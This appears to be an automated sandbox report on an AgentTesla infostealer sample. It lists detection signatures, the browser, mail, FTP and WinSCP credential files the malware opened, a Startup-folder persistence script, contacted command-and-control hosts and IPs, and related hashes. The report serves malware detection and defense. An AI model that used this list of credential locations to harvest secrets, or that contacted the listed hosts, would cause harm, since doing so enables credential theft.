mcupdate.exe

                Stealing of Sensitive Information

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: unjuridically.exeBinary or memory string: WIN_81
                Source: unjuridically.exeBinary or memory string: WIN_XP
                Source: unjuridically.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: unjuridically.exeBinary or memory string: WIN_XPe
                Source: unjuridically.exeBinary or memory string: WIN_VISTA
                Source: unjuridically.exeBinary or memory string: WIN_7
                Source: unjuridically.exeBinary or memory string: WIN_8
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5728, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6520, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009D8C4F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009D923B
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00478C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00478C4F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0047923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_0047923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting                		2
                Valid Accounts                		221
                Windows Management Instrumentation                		111
                Scripting                		1
                Exploitation for Privilege Escalation                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		1
                Exfiltration Over Alternative Protocol                		1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts3
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol2
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		2
                Obfuscated Files or Information                		1
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                DLL Side-Loading                		NTDS138
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection                		1
                Masquerading                		LSA Secrets761
                Security Software Discovery                		SSH3
                Clipboard Data                		12
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		Cached Domain Credentials231
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items231
                Virtualization/Sandbox Evasion                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588621 Sample: RHOqJ5BrHW.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 30 ip-api.com 2->30 32 ftp.antoniomayol.com 2->32 34 antoniomayol.com 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 11 other signatures 2->46 8 RHOqJ5BrHW.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\unjuridically.exe, PE32 8->26 dropped 62 Binary is likely a compiled AutoIt script file 8->62 14 unjuridically.exe 3 8->14         started        64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->64 18 unjuridically.exe 2 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\unjuridically.vbs, data 14->28 dropped 66 Antivirus detection for dropped file 14->66 68 Multi AV Scanner detection for dropped file 14->68 70 Binary is likely a compiled AutoIt script file 14->70 76 4 other signatures 14->76 20 RegSvcs.exe 15 2 14->20         started        72 Writes to foreign memory regions 18->72 74 Maps a DLL or memory area into another process 18->74 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 antoniomayol.com 162.241.62.63, 21, 35211, 49705 UNIFIEDLAYER-AS-1US United States 20->36 38 ip-api.com 208.95.112.1, 49704, 49706, 80 TUT-ASUS United States 20->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->48 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 20->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal ftp login credentials 24->58 60 Tries to harvest and steal browser information (history, passwords, etc) 24->60 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RHOqJ5BrHW.exe58%ReversingLabsWin32.Trojan.AutoitInject
                RHOqJ5BrHW.exe62%VirustotalBrowse
                RHOqJ5BrHW.exe100%AviraHEUR/AGEN.1319212
                RHOqJ5BrHW.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Lityerses\unjuridically.exe100%AviraHEUR/AGEN.1319212
                C:\Users\user\AppData\Local\Lityerses\unjuridically.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Lityerses\unjuridically.exe58%ReversingLabsWin32.Trojan.AutoitInject
                C:\Users\user\AppData\Local\Lityerses\unjuridically.exe62%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                antoniomayol.com
                		162.241.62.63
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    ftp.antoniomayol.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/line/?fields=hostingfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://antoniomayol.comRegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://ftp.antoniomayol.comRegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://account.dyn.com/unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ip-api.comRegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.95.112.1
                                  		ip-api.comUnited States
                                  		53334TUT-ASUSfalse
                                  162.241.62.63
                                  		antoniomayol.comUnited States
                                  		46606UNIFIEDLAYER-AS-1USfalse

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588621
                                  Start date and time:2025-01-11 03:18:27 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 41s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:9
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:RHOqJ5BrHW.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 304
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:19:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs
                                  21:19:21API Interceptor9860381x Sleep call for process: RegSvcs.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.95.112.1J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  162.241.62.63Order 122001-220 guanzo.exeGet hashmaliciousFormBookBrowse
                                  • www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.comJ8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  UNIFIEDLAYER-AS-1USru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                  • 192.254.186.165
                                  28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.241.62.63
                                  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                  • 162.241.149.91
                                  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                  • 162.241.149.91
                                  Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                  • 108.179.241.236
                                  e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.241.62.63
                                  https://probashkontho.com/work/Organization/privacy/index_.htmlGet hashmaliciousUnknownBrowse
                                  • 192.185.57.31
                                  Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                  • 192.254.186.165
                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                  • 162.241.149.91
                                  secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                  • 162.241.149.91
                                  TUT-ASUSJ8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
